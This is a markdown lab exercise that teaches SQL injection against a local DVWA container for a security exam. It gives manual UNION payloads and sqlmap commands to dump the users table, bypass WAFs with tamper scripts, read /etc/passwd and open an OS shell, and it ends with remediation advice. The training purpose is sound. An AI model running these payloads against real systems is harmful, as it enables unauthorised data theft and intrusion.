Skip to content

Latest commit

 

History

History
131 lines (86 loc) · 3.06 KB

File metadata and controls

131 lines (86 loc) · 3.06 KB

Lab 27 — SQL Injection with sqlmap

Exam objective: 4.5 Injection attacks — SQL injection.

In this lab you will exploit SQL injection in DVWA manually and then automate the entire dump with sqlmap.

sudo docker run --rm -d --name dvwa -p 80:80 vulnerables/web-dvwa

Browse to http://127.0.0.1, log in (admin/password), Security → Low, then click SQL Injection.


Step 1 — Manual injection (understanding first)

The endpoint is GET /vulnerabilities/sqli/?id=1. Try:

?id=1
?id=1' OR '1'='1
?id=1' UNION SELECT 1,version()-- -
?id=1' UNION SELECT user,password FROM users-- -

You learn:

  • Number of columns (use ORDER BY to find).
  • DBMS version (version()).
  • Table/column names.

Step 2 — Grab the session cookie

In DevTools → Application → Cookies, copy PHPSESSID and security.

COOKIE="PHPSESSID=abc; security=low"
URL='http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit'

Step 3 — sqlmap discovery

sqlmap -u "$URL" --cookie="$COOKIE" --batch

--batch accepts all default prompts. sqlmap detects: parameter id is injectable via boolean-based, error-based and UNION query, DBMS is MySQL.


Step 4 — Enumerate the database

sqlmap -u "$URL" --cookie="$COOKIE" --batch --dbs
sqlmap -u "$URL" --cookie="$COOKIE" --batch -D dvwa --tables
sqlmap -u "$URL" --cookie="$COOKIE" --batch -D dvwa -T users --columns
sqlmap -u "$URL" --cookie="$COOKIE" --batch -D dvwa -T users --dump

You will see the MD5 hash for admin — crack it in Lab 24.


Step 5 — Risk & level tuning

sqlmap -u "$URL" --cookie="$COOKIE" --risk=3 --level=5 --batch
  • --level 1–5 how many payloads.
  • --risk 1–3 how heavy (3 allows OR-based blind, may slow target).

Use --tamper=space2comment,between to bypass simple WAFs.


Step 6 — POST / JSON / Auth

For a POST form:

sqlmap -u 'http://target/login' --data='user=a&pass=b' --batch

For JSON API:

sqlmap -u 'http://target/api/search' \
       --data='{"q":"*"}' --headers='Content-Type: application/json' \
       --batch

Capture the raw HTTP request from Burp → Save item → feed to sqlmap with -r:

sqlmap -r request.txt --batch

Step 7 — Beyond data extraction

If the DB user has FILE / xp_cmdshell privileges:

sqlmap -r request.txt --os-shell        # MySQL / MSSQL OS command shell
sqlmap -r request.txt --file-read=/etc/passwd

--os-shell is invasive — confirm scope before using.


Step 8 — Remediation in the report

For every SQLi finding:

  • CWE-89 SQL Injection, OWASP A03:2021 Injection, ATT&CK T1190.
  • Recommend prepared statements / parameterised queries.
  • Add WAF managed SQLi rule as compensating control.
  • Rotate any credentials that were exposed via --dump.

What you learned

  • The manual UNION-based injection flow before reaching for sqlmap.
  • How to drive sqlmap with cookies, POST, JSON and Burp raw requests.
  • The risk/level/tamper levers and when to stop short of --os-shell.